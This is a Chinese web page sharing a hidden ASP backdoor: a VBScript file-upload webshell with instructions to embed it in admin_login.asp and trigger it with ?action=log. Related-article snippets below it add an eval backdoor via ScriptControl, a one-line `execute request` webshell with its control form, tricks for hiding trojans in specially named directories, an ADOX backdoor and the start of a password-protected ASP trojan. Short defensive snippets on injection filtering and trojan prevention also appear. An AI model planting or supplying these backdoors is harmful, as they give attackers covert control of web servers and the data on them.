隐蔽的ASP后门 大家可以查看下_木马相关

复制代码 代码如下:

<%if request.QueryString("action")="log" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>

比如编辑在“admin_login.asp”下
以后只需要输入“admin_login.asp?action=log”即可

时间: 2024-10-28 12:20:20

隐蔽的ASP后门 大家可以查看下_木马相关的相关文章

一个较新的ASP后门服务端实现代码_木马相关

今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用.研究了下方法,后来和lcx讨论了下.得到了如下代码,在此感谢前辈的指点,呵呵. 代码很简单,我就不多做解释了,以免有人骂我装. 复制代码 代码如下: <% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '参数S

防范ASP木马的十大基本原则强列建议看下_木马相关

由于ASP它本身是服务器提供的一项服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁.因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.      几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改.数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施

隐藏ASP木马后门的两种方法_木马相关

1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

一段asp防注入的通用脚本_木马相关

放在conn.asp里就行了.  '屏蔽通过地址栏攻击  url=Request.ServerVariables("QUERY_STRING")  if instr(url,";")>=1 then  url=Replace(url,";",":") : Response.Redirect("?" & url)  end if  '屏蔽通过表单攻击  for each item in requ

七步倒┈→专用asp后门_木马相关

<html> <head> <title>七步倒┈→专用asp后门</title> </head> </html> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.FileSyst

新型ASP后门源代码分析_木马相关

本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢!  利用的是ADOX.Catalog组件  复制代码 代码如下: <%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPath(db)    set ydb=server.CreateObject("ADOX.Catalog"

几种另类的ASP后门_木马相关

<%  'code by netpatch dim dbfile,sql  db="netpatch.asp" dbfile=server.MapPath(db)  set ydb=server.CreateObject("ADOX.Catalog")  ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile  set ydb=nothing  if e

最小asp后门程序_木马相关

首先在asp文件中写如<%execute request("value")%>代码如果想要隐藏,就要加入一些if判断语句,即可然后在本地写个表单 复制代码 代码如下: <form action=http://***.com/jb51.asp method=post> <textarea name=value cols=120 rows=10 width=45> set lP=server.createObject("Adodb.Stream

一款不错的asp木马 黑色界面_木马相关

<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617"                           '密码 mName="BY:.尐飛"           '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责"       '版权 Server.ScriptTimeout=9